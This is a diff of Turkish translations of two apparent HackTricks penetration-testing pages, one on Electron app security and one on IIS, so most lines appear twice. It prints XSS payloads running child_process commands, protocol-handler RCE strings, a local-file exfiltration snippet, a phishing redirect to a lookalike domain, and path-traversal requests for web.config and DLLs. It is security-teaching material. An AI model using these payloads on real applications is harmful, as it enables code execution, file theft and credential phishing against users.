<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
## Giriş
Electron, yerel bir arka uç (ile **NodeJS**) ve bir ön uç (**Chromium**) birleştirir, ancak modern tarayıcıların bazı güvenlik mekanizmalarını eksikliği bulunmaktadır.
Electron, yerel bir arka uç (ile **NodeJS**) ve bir ön uç (**Chromium**) birleştirir, ancak modern tarayıcıların bazı güvenlik mekanizmalarını eksikliği vardır.
Genellikle electron uygulama kodunu bir `.asar` uygulamasının içinde bulabilirsiniz, kodu elde etmek için onu çıkartmanız gerekmektedir:
Genellikle, electron uygulama kodunu bir `.asar` uygulamasının içinde bulabilirsiniz, kodu elde etmek için onu çıkartmanız gerekir:
```bash
npx asar extract app.asar destfolder #Extract everything
npx asar extract-file app.asar main.js #Extract just a file
@ -44,18 +58,18 @@ let win = new BrowserWindow();
//Open Renderer Process
win.loadURL(`file://path/to/index.html`);
```
**Renderer işlemi**nin ayarları, main.js dosyası içinde **ana işlem**de **ayarlanabilir**. Bazı yapılandırmalar, **ayarlar doğru bir şekilde yapılandırıldığında**, Electron uygulamasının RCE almasını veya diğer güvenlik açıklarını önleyebilir.
**Renderer işlemi**nin ayarları, main.js dosyası içinde **ana işlem**de **ayarlanabilir**. Bazı yapılandırmalar, **ayarlar doğru bir şekilde yapılandırıldığında**, Electron uygulamasının RCE veya diğer güvenlik açıklarını **engelleyebilir**.
Elektron uygulaması, Node API'leri aracılığıyla cihaza erişebilir, ancak bunu önlemek için yapılandırılabilir:
Electron uygulaması, Node API'leri aracılığıyla cihaza **erişebilir** ancak bunu **engellemek için yapılandırılabilir**:
- **`nodeIntegration`** - varsayılan olarak `kapalı`dır. Açık olduğunda, renderer işleminden node özelliklerine erişime izin verir.
- **`contextIsolation`** - varsayılan olarak `açık`tır. Kapalı olduğunda, ana ve renderer işlemleri izole edilmez.
- **`preload`** - varsayılan olarak boştur.
- [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - varsayılan olarak kapalıdır. NodeJS'nin gerçekleştirebileceği işlemleri kısıtlayacaktır.
- İşçilerde Node Entegrasyonu
- **`nodeIntegrationInSubframes`** - varsayılan olarak `kapalı`dır.
- Eğer **`nodeIntegration`** etkinse, bu, Electron uygulaması içindeki iframelerde yüklenen web sayfalarında **Node.js API'lerinin kullanılmasına izin verecektir**.
- Eğer **`nodeIntegration`** devre dışı bırakılmışsa, ön yüklemeler iframede yüklenecektir.
* **`nodeIntegration`** - varsayılan olarak `kapalı`dır. Açık olduğunda, renderer işleminden Node özelliklerine erişime izin verir.
* **`contextIsolation`** - varsayılan olarak `açık`tır. Kapalı olduğunda, ana ve renderer işlemleri izole edilmez.
* **`preload`** - varsayılan olarak boştur.
* [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - varsayılan olarak kapalıdır. NodeJS'nin gerçekleştirebileceği işlemleri kısıtlayacaktır.
* İşçilerde Node Entegrasyonu
* **`nodeIntegrationInSubframes`** - varsayılan olarak `kapalı`dır.
* Eğer **`nodeIntegration`** etkinse, bu, Electron uygulaması içindeki iframlarda yüklenen web sayfalarında **Node.js API'lerinin** kullanımına izin verecektir.
* Eğer **`nodeIntegration`** devre dışı bırakılmışsa, ön yüklemeler iframda yüklenecektir.
Yapılandırma örneği:
```javascript
@ -95,15 +109,15 @@ Example Payloads (Linux & MacOS):
<img src=x onerror="alert(require('child_process').execSync('ls -l').toString());">
<img src=x onerror="alert(require('child_process').execSync('uname -a').toString());">
```
### Trafik yakalama
### Trafik Yakalama
Başlangıç ana yapılandırmasını değiştirin ve şu gibi bir proxy kullanımını ekleyin:
Başlangıç ana yapılandırmasını değiştirin ve şöyle bir proxy kullanımı ekleyin:
```javascript
"start-main": "electron ./dist/main/main.js --proxy-server=127.0.0.1:8080 --ignore-certificateerrors",
```
## Electron Yerel Kod Enjeksiyonu
Bir Electron Uygulamasını yerel olarak çalıştırabilirseniz, keyfi JavaScript kodunu çalıştırmasını sağlayabilirsiniz. Nasıl yapılacağını kontrol edin:
Bir Electron Uygulamasını yerel olarak yürütebiliyorsanız, keyfi JavaScript kodunu yürütmesini sağlayabilirsiniz. Nasıl yapılacağını kontrol edin:
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md" %}
[macos-electron-applications-injection.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md)
@ -111,7 +125,7 @@ Bir Electron Uygulamasını yerel olarak çalıştırabilirseniz, keyfi JavaScri
## Uzaktan Kod Çalıştırma: XSS + nodeIntegration
Eğer **nodeIntegration** **ık** olarak ayarlanmışsa, bir web sayfasının JavaScript'i, `require()` fonksiyonunu çağırarak Node.js özelliklerini kolayca kullanabilir. Örneğin, Windows üzerinde hesap makinesini çalıştırmak için:
Eğer **nodeIntegration** **on** olarak ayarlanmışsa, bir web sayfasının JavaScript'i `require()` çağrısını yaparak Node.js özelliklerini kolayca kullanabilir. Örneğin, Windows üzerinde hesap makinesini çalıştırmanın yolu:
```html
<script>
require('child_process').exec('calc');
@ -123,7 +137,7 @@ top.require('child_process').exec('open /System/Applications/Calculator.app');
## RCE: preload
Bu ayar içinde belirtilen betik, **diğer betiklerden önce yüklendiği için**, bu nedenle **Node API'lerine sınırsız erişime sahiptir**:
Bu ayarlar içinde belirtilen betik, **diğer betiklerden önce yüklendiği için**, bu nedenle **Node API'lerine sınırsız erişime sahiptir**:
```javascript
new BrowserWindow{
webPreferences: {
@ -162,11 +176,11 @@ runCalc();
_**contextIsolation**_, **web sayfası betikleri ile JavaScript Electron'un dahili kodu arasında ayrı bağlamlar** tanıtarak her kodun JavaScript yürütmesinin birbirini etkilememesini sağlar. Bu, RCE olasılığını ortadan kaldırmak için gerekli bir özelliktir.
Bağlamlar izole edilmediğinde bir saldırgan:
Bağlamlar izole edilmediğinde bir saldırgan şunları yapabilir:
1. **Renderer'da keyfi JavaScript yürütebilir** (XSS veya harici sitelere yönlendirme)
2. Preload veya Electron dahili kodunda kullanılan **dahili yöntemi üzerine yazar**
3. **Üzerine yazılan fonksiyonun** kullanımını **tetikler**
1. **Renderer'da keyfi JavaScript yürütme** (XSS veya harici sitelere yönlendirme)
2. Preload veya Electron dahili kodunda kullanılan **dahili yöntemi üzerine yazma**
3. **Üzerine yazılan fonksiyonun tetiklenmesi**
4. RCE?
Dahili yöntemlerin üzerine yazılabileceği 2 yer vardır: Preload kodunda veya Electron dahili kodunda:
@ -185,22 +199,22 @@ Dahili yöntemlerin üzerine yazılabileceği 2 yer vardır: Preload kodunda vey
### Tıklama etkinini atlatma
Bir bağlantıya tıkladığınızda kısıtlamalar uygulanmışsa, bunları atlayabilirsiniz **normal sol tıklama** yerine **orta tıklama** yaparak.
Bir bağlantıya tıkladığınızda kısıtlamalar uygulandıysa, bunları atlayabilir ve bunun yerine düzenli bir sol tıklama yerine **orta tıklama** yaparak atlayabilirsiniz.
```javascript
window.addEventListener('click', (e) => {
```
## shell.openExternal Aracılığıyla Uzaktan Kod Çalıştırma (RCE)
## shell.openExternal Aracılığıyla Uzaktan Kod Yürütme (RCE)
Bu örnekler hakkında daha fazla bilgi için [https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8) ve [https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/) adreslerini kontrol edin.
Bu örnekler hakkında daha fazla bilgi için [https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8) ve [https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/) adreslerini kontrol edebilirsiniz.
Bir Electron masaüstü uygulaması dağıtılırken, `nodeIntegration` ve `contextIsolation` için doğru ayarların yapılması hayati önem taşır. Bu ayarların yapıldığı durumlarda, preload betiklerine veya Electron'un ana işleminden gelen doğrudan **istemci tarafından uzaktan kod yürütme (RCE)** saldırıları etkili bir şekilde engellenir.
Bir Electron masaüstü uygulaması dağıtılırken, `nodeIntegration` ve `contextIsolation` için doğru ayarların yapılması hayati önem taşır. Bu ayarların yapıldığı durumlarda, **istemci tarafından uzaktan kod yürütme (RCE)**, preload betiklerini veya Electron'un ana işleminden gelen yerel kodu hedef alan etkili bir şekilde engellenir.
Kullanıcıların bağlantılara etkileşimde bulunması veya yeni pencereler açması durumunda, belirli olay dinleyicileri tetiklenir; bu, uygulamanın güvenliği ve işlevselliği için önemlidir:
```javascript
webContents.on("new-window", function (event, url, disposition, options) {}
webContents.on("will-navigate", function (event, url) {}
```
Bu dinleyiciler, masaüstü uygulaması tarafından **geçersiz kılınır** ve kendi **iş mantığını** uygulamak için kullanılır. Uygulama, yönlendirilen bir bağlantının dahili olarak mı yoksa harici bir web tarayıcısında mıılması gerektiğini değerlendirir. Bu karar genellikle `openInternally` işlevi aracılığıyla yapılır. Bu işlev `false` döndürürse, bağlantının harici olarak açılması gerektiğini gösterir ve `shell.openExternal` işlevini kullanır.
Bu dinleyiciler, masaüstü uygulaması tarafından **üzerine yazılarak** kendi **iş mantığını** uygulamak için kullanılır. Uygulama, yönlendirilen bir bağlantının dahili olarak mı yoksa harici bir web tarayıcısında mıılması gerektiğini değerlendirir. Bu karar genellikle `openInternally` işlevi aracılığıyla yapılır. Bu işlev `false` döndürürse, bağlantının `shell.openExternal` işlevini kullanarak harici olarak açılması gerektiğini gösterir.
**İşte basitleştirilmiş bir yalancı kod:**
@ -208,7 +222,7 @@ Bu dinleyiciler, masaüstü uygulaması tarafından **geçersiz kılınır** ve
![https://miro.medium.com/max/1400/1\*ZfgVwT3X1V\_UfjcKaAccag.png](<../../../.gitbook/assets/image (960).png>)
Electron JS güvenlik en iyi uygulamaları, `openExternal` işlevi ile güvenilmeyen içeriği kabul etmemeyi önerir, çünkü bu çeşitli protokoller aracılığıyla RCE'ye yol açabilir. İşletim sistemleri, bu zafiyeti sömürebilecek farklı protokolleri destekler. Bu konuda detaylı örnekler ve daha fazla açıklama için [bu kaynağa](https://positive.security/blog/url-open-rce#windows-10-19042) başvurulabilir. Bu kaynak, bu zafiyeti sömürebilen Windows protokol örneklerini içerir.
Electron JS güvenlik en iyi uygulamaları, `openExternal` işlevi ile güvensiz içeriği kabul etmemeyi önerir, çünkü bu çeşitli protokoller aracılığıyla RCE'ye yol açabilir. İşletim sistemleri, bu zafiyeti sömürebilecek farklı protokolleri destekler. Bu konuda detaylı örnekler ve daha fazla açıklama için [bu kaynağa](https://positive.security/blog/url-open-rce#windows-10-19042) başvurulabilir. Bu kaynak, bu zafiyeti sömürebilen Windows protokol örneklerini içerir.
**Windows protokolü zafiyet örnekleri şunları içerir:**
```html
@ -226,11 +240,11 @@ window.open("ms-officecmd:%7B%22id%22:3,%22LocalProviders.LaunchOfficeAppForResu
```
## Dahili Dosyaları Okuma: XSS + contextIsolation
**`contextIsolation` devre dışı bırakıldığında `<webview>` etiketlerinin kullanılmasına izin verilir**, `<iframe>` ile benzer şekilde, yerel dosyaların okunması ve dışa aktarılması için. Bir örnek, bu zafiyetin nasıl sömürüleceğini ve dahili dosyaların içeriğinin nasıl okunacağını göstermektedir:
**`contextIsolation` devre dışı bırakıldığında `<webview>` etiketlerinin kullanımına izin verilir**, `<iframe>` gibi, yerel dosyaları okumak ve dışa aktarmak için. Bir örnek, bu zafiyeti sömürmek için iç dosyaların içeriğini okumayı göstermektedir:
![](<../../../.gitbook/assets/1 u1jdRYuWAEVwJmf_F2ttJg (1).png>)
Daha da ileri gidilerek, bir **dahili dosyanın okunması** için başka bir yöntem paylaşılmış ve bir Electron masaüstü uygulamasında kritik bir yerel dosya okuma zafiyeti vurgulanmıştır. Bu, uygulamayı sömürmek ve veri dışa aktarmak için bir betik enjekte etmeyi içerir:
Daha da ileri gidilerek, bir **dahili dosyayı okuma** yöntemi paylaşılır ve bir Electron masaüstü uygulamasında kritik bir yerel dosya okuma zafiyeti vurgulanır. Bu, uygulamayı sömürmek ve veri dışa aktarmak için bir betik enjekte etmeyi içerir:
```html
<br><BR><BR><BR>
<h1>pwn<br>
@ -246,16 +260,16 @@ Bir örneği bu **makalede** görebilirsiniz: [https://blog.electrovolt.io/posts
## **Dahili URL regex atlatma ile XSS Phishing**
Bir XSS bulduysanız ancak **RCE tetikleyemez veya dahili dosyaları çalamazsanız**, bunu **phishing yoluyla kimlik bilgilerini çalmak için kullanmaya çalışabilirsiniz**.
Bir XSS bulduysanız ancak **RCE tetikleyemez veya dahili dosyaları çalamazsanız**, bunu **phishing yoluyla kimlik bilgilerini çalmak** için kullanmaya çalışabilirsiniz.
Öncelikle, yeni bir URL açmaya çalıştığınızda ne olduğunu bilmelisiniz, ön uçtaki JS kodunu kontrol ederek:
```javascript
webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below)
webContents.on("will-navigate", function (event, url) {} // opens the custom openInternally function (it is declared below)
```
**`openInternally`** fonksiyonuna yapılan çağrı, bağlantının platforma ait bir bağlantı olup olmadığına karar verecektir, **veya** tarayıcıda 3. taraf bir kaynak olarak açılacaktır.
**`openInternally`** fonksiyonuna yapılan çağrı, bağlantının platforma ait bir bağlantı olup olmadığına karar verecektir, ya da 3. taraf bir kaynak olarak tarayıcıdaılacaktır.
Fonksiyon tarafından kullanılan **regex**'in (örneğin, **alt alanların noktalarını kaçırmadan**) **atlatılabilir** olması durumunda, saldırgan XSS'i **kullanarak kullanıcıdan kimlik bilgilerini isteyen** saldırgan altyapısında **yer alan yeni bir pencere açabilir**:
Fonksiyon tarafından kullanılan **regex**'in (örneğin, alt alanların noktalarını kaçırmadan) **atlatılabilir** olması durumunda, saldırgan XSS'i **kullanarak kullanıcıdan kimlik bilgilerini isteyen** saldırgan altyapısında bulunan yeni bir pencere açabilir:
```html
<script>
window.open("<http://subdomainagoogleq.com/index.html>")
@ -265,7 +279,7 @@ window.open("<http://subdomainagoogleq.com/index.html>")
* [**Electronegativity**](https://github.com/doyensec/electronegativity), Electron tabanlı uygulamalardaki yanlış yapılandırmaları ve güvenlik karşı desenleri belirlemek için bir araçtır.
* [**Electrolint**](https://github.com/ksdmitrieva/electrolint), Electronegativity kullanan Electron uygulamaları için açık kaynaklı bir VS Code eklentisidir.
* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan), zayıf üçüncü taraf kütüphaneleri kontrol etmek için kullanılır.
* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan), zafiyetli üçüncü taraf kütüphaneleri kontrol etmek için kullanılır.
* [**Electro.ng**](https://electro.ng/): Satın almanız gerekmektedir.
## Labaratuvarlar
@ -305,16 +319,28 @@ npm start
* Electron güvenliği hakkında daha fazla araştırma ve yazılar için [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)
* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) bir şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan bir **dark-web** destekli bir arama motorudur.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
* [**The PEASS Family'yi keşfedin**](https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya bizi Twitter'da** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR'lar göndererek paylaşın.
</details>

View file

@ -1,4 +1,4 @@
# IIS - Internet Information Services
# IIS - Internet Bilgi Hizmetleri
<details>
@ -6,30 +6,48 @@
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na(https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonu
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family)
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR göndererek HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
Test yürütülebilir dosya uzantıları:
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
Test edilebilir dosya uzantıları:
* asp
* aspx
* config
* php
## Dahili IP Adresi ifşası
## Dahili IP Adresi ığa Çıkarma
302 alınan herhangi bir IIS sunucusunda, Host başlığını kaldırmayı deneyebilir ve HTTP/1.0 kullanarak içerideki yanıtın Location başlığının dahili IP adresine işaret edip etmediğini kontrol edebilirsiniz:
302 alınan herhangi bir IIS sunucusunda, Host başlığını kaldırmayı deneyebilir ve HTTP/1.0 kullanarak içerideki yanıtın Location başlığının sizi dahili IP adresine yönlendirebileceğini deneyebilirsiniz:
```
nc -v domain.com 80
openssl s_client -connect domain.com:443
```
```html
<h2>İç IP adresini ifşa eden yanıt:</h2>
<p>Internal IP Address: 192.168.1.10</p>
```
```html
<p>İç IP Adresi: 192.168.1.10</p>
```
```
GET / HTTP/1.0
@ -62,7 +80,7 @@ Bu liste aşağıdaki listelerin içeriğini birleştirerek oluşturulmuştur:
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt)\
[https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt)
Uzantı eklemeksizin kullanın, ihtiyacı olan dosyalar zaten içermektedir.
Uzantı eklemeksizin kullanın, ihtiyacı olan dosyalar zaten ekli.
## Yol Geçişi
@ -72,11 +90,11 @@ Tam açıklamayı kontrol edin: [https://blog.mindedsecurity.com/2018/10/from-pa
{% hint style="info" %}
Özet olarak, uygulamanın klasörlerinde "**assemblyIdentity**" dosyalarına ve "**namespaces**"e referans veren birkaç web.config dosyası bulunmaktadır. Bu bilgi ile **uygulamanın nerede yürütülebilir dosyaların bulunduğunu** bilmek mümkündür ve bunları indirebilirsiniz.\
İndirilen Dll'lerden, **yeni namespaces** bulunabilir ve erişmeye çalışmanız gereken yeni namespaces ve assemblyIdentity'leri bulmak için web.config dosyasını alabilirsiniz.\
İndirilen Dll'lerden yeni **namespaces** bulunabilir ve erişmeye çalışmanız gereken yeni namespaces ve assemblyIdentity'leri bulmak için web.config dosyasını alabilirsiniz.\
Ayrıca, **connectionstrings.config** ve **global.asax** dosyaları ilginç bilgiler içerebilir.\\
{% endhint %}
**.Net MVC uygulamalarında**, **web.config** dosyası, uygulamanın her bir ikili dosyaya **"assemblyIdentity"** XML etiketleri aracılığıyla bağımlı olduğunu belirleyerek önemli bir rol oynar.
**.Net MVC uygulamalarında**, **web.config** dosyası, uygulamanın her bir ikili dosyaya "**assemblyIdentity**" XML etiketleri aracılığıyla bağımlı olduğunu belirterek önemli bir rol oynar.
### **İkili Dosyaları Keşfetme**
@ -91,7 +109,7 @@ Bu istek, çeşitli ayarları ve bağımlılıkları ortaya çıkarır, örneği
* Web sayfaları, istemci doğrulaması ve JavaScript için **AppSettings**
* Kimlik doğrulama ve çalışma zamanı için **System.web** yapılandırmaları
* **System.webServer** modüller ayarları
* **Microsoft.Owin**, **Newtonsoft.Json** ve **System.Web.Mvc** gibi birçok kütüphane için **Runtime** derleme bağlantıları
* **Microsoft.Owin**, **Newtonsoft.Json** ve **System.Web.Mvc** gibi çeşitli kütüphaneler için **Runtime** derleme bağlantıları
Bu ayarlar, belirli dosyaların, örneğin **/bin/WebGrease.dll** gibi, uygulamanın /bin klasöründe bulunduğunu gösterir.
@ -101,21 +119,21 @@ Bu ayarlar, belirli dosyaların, örneğin **/bin/WebGrease.dll** gibi, uygulama
### **Ad Alanları ve Web.Config**
MVC uygulamaları, her dosyada tekrarlayan deklarasyonlardan kaçınmak için belirli ad alanları için ek **web.config dosyaları** tanımlar, başka bir **web.config** dosyasını indirmek için yapılan bir istekte olduğu gibi.
MVC uygulamaları, her dosyada tekrarlayan deklarasyonlardan kaçınmak için belirli ad alanları için ek **web.config dosyaları** tanımlar. Başka bir **web.config** dosyasını indirmek için yapılan bir istekte olduğu gibi.
```markup
GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded
```
### **DLL'lerin İndirilmesi**
Özel bir ad alanından bahsedilmesi, /bin dizininde bulunan "**WebApplication1**" adlı bir DLL'ye işaret ediyor. Buna bağlı olarak, **WebApplication1.dll**'nin indirilmesi için bir istek gösterilmiştir:
Özel bir ad alanından bahsedilmesi, /bin dizininde bulunan "**WebApplication1**" adlı bir DLL'ye işaret ediyor. Buna bağlı olarak, **WebApplication1.dll** dosyasını indirmek için bir istek gösterilmiştir:
```markup
GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded
```
Bu, /bin dizininde **System.Web.Mvc.dll** ve **System.Web.Optimization.dll** gibi diğer önemli DLL'lerin varlığını işaret eder.
Bir DLL'nin **WebApplication1.Areas.Minded** adında bir ad alanı içe aktardığı bir senaryoda, saldırgan, /bin klasöründeki diğer DLL'leri referans alan belirli yapılandırmaları ve referansları içeren, öngörülebilir yollardaki diğer web.config dosyalarının varlığını çıkarabilir. Örneğin, **/Minded/Views/web.config**'a yapılan bir istek, varlığı gösteren yapılandırmalar ve ad alanları ortaya çıkarabilir, başka bir DLL olan **WebApplication1.AdditionalFeatures.dll**.
Bir DLL'nin **WebApplication1.Areas.Minded** adında bir ad alanı içe aktardığı bir senaryoda, saldırgan, /bin klasöründeki diğer DLL'lerin referanslarını ve belirli yapılandırmaları içeren, öngörülebilir yollardaki diğer web.config dosyalarının varlığını çıkarabilir. Örneğin, **/Minded/Views/web.config**'a yapılan bir istek, varlığı gösteren yapılandırmalar ve ad alanları ortaya çıkarabilir, başka bir DLL olan **WebApplication1.AdditionalFeatures.dll**.
### Ortak dosyalar
@ -200,9 +218,9 @@ C:\xampp\tomcat\conf\server.xml
Eğer aşağıdaki gibi bir hata görürseniz:
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10) (2).png>)
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10) (2).png>)
Bu, sunucunun **Doğru etki alanı adını** Host başlığı içinde almadığı anlamına gelir. Web sayfasına erişmek için sunulan **SSL Sertifikası**'na bakabilir ve belki de etki alanı/alt etki alanı adını orada bulabilirsiniz. Eğer orada değilse, doğru olanı bulana kadar **VHost'ları brute force** etmeniz gerekebilir.
Bu, sunucunun **Doğru etki alanı adını** Host başlığı içinde almadığı anlamına gelir. Web sayfasına erişmek için sunulan **SSL Sertifikası**'na bakabilir ve belki de etki alanı/alt etki alanı adını orada bulabilirsiniz. Eğer orada değilse, doğru olanı bulana kadar **VHost'ları brute force** edebilirsiniz.
## Araştırılmaya Değer Eski IIS Zayıflıkları
@ -246,12 +264,12 @@ ASPXAUTH aşağıdaki bilgileri kullanır:
* **`decryptionIV`** (dize): onaltılık kodlu başlatma vektörü (sıfırlar vektörüne varsayılan olarak).
* **`decryptionKey`** (dize): Şifre çözümü için kullanılacak onaltılık kodlu anahtar.
Ancak, bazı insanlar bu parametrelerin **varsayılan değerlerini** kullanacak ve **çerez olarak kullanıcı e-postasını** kullanacaklardır. Bu nedenle, ASPXAUTH çerezini kullanan aynı platformu kullanan bir web sitesi bulabilir ve saldırı altındaki sunucuda **taklit etmek istediğiniz kullanıcının e-postasıyla bir kullanıcı oluşturabilirseniz**, ikinci sunucudan aldığınız çerezi birinci sunucuda kullanarak kullanıcıyı taklit edebilirsiniz.\
Ancak, bazı insanlar bu parametrelerin **varsayılan değerlerini** kullanacak ve **çerez olarak kullanıcı e-postasını** kullanacaklardır. Bu nedenle, ASPXAUTH çerezini kullanan aynı platformu kullanan bir web sitesi bulabilir ve saldırı altındaki sunucuda **taklit etmek istediğiniz kullanıcının e-postasıyla bir kullanıcı oluşturabilirseniz**, ikinci sunucudan gelen çerezi birinci sunucuda kullanarak kullanıcıyı taklit edebilirsiniz.\
Bu saldırı, bu [**yazıda**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19) işe yaramıştır.
## Önbelleğe Alınmış Şifrelerle IIS Kimlik Doğrulamasını Atlatma (CVE-2022-30209) <a href="#id-3-iis-authentication-bypass" id="id-3-iis-authentication-bypass"></a>
[Tam rapor burada](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): Kodda bir hata, kullanıcı tarafından verilen şifreyi doğru bir şekilde kontrol etmediği için, **şifre hash'i önbellekte bulunan bir anahtarı vurduğunda**, saldırganın o kullanıcı olarak giriş yapabilmesine olanak tanır.
